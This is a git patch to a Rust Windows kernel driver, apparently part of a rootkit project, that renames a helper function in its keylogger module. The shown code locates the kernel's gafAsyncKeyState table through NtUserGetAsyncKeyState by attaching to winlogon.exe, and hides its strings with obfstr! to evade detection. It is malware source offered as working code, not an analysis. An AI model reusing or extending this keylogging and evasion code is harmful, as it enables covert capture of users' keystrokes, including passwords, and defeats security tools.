From b9075399c05ea3c8adb5490045f405c900a2fb77 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Jo=C3=A3o?= Date: Fri, 26 Jul 2024 19:51:27 -0300 Subject: [PATCH] Renaming the gafAsyncKeyState recovery function --- driver/src/keylogger/mod.rs | 4 ++-- driver/src/utils/mod.rs | 2 +- 2 files changed, 3 insertions(+), 3 deletions(-) diff --git a/driver/src/keylogger/mod.rs b/driver/src/keylogger/mod.rs index 23a3d57..60b192a 100644 --- a/driver/src/keylogger/mod.rs +++ b/driver/src/keylogger/mod.rs @@ -8,7 +8,7 @@ use { get_ks_byte, get_ks_down_bit, includes::MmCopyVirtualMemory, is_key_down, set_key_down, - utils::{get_function_address_asynckey, get_module_base_address, get_process_by_name}, + utils::{get_address_asynckey, get_module_base_address, get_process_by_name}, }, wdk_sys::{ ntddk::{ @@ -181,7 +181,7 @@ unsafe fn get_gafasynckeystate_address() -> Option { Some(addr) => addr, None => return None }; - let function_address = match get_function_address_asynckey(obfstr!("NtUserGetAsyncKeyState"), module_address) { + let function_address = match get_address_asynckey(obfstr!("NtUserGetAsyncKeyState"), module_address) { Some(addr) => addr, None => return None, }; diff --git a/driver/src/utils/mod.rs b/driver/src/utils/mod.rs index 7a7f236..09a0f60 100644 --- a/driver/src/utils/mod.rs +++ b/driver/src/utils/mod.rs @@ -166,7 +166,7 @@ pub unsafe fn get_function_address(function_name: &str, dll_base: *mut c_void) - /// # Returns /// - `Option<*mut c_void>`: An optional pointer to the function's address, or None if the function is not found. /// -pub unsafe fn get_function_address_asynckey(name: &str, dll_base: *mut c_void) -> Option<*mut c_void> { +pub unsafe fn get_address_asynckey(name: &str, dll_base: *mut c_void) -> Option<*mut c_void> { let mut apc_state: KAPC_STATE = core::mem::zeroed(); let pid = match get_process_by_name(obfstr!("winlogon.exe")) { Some(p) => p,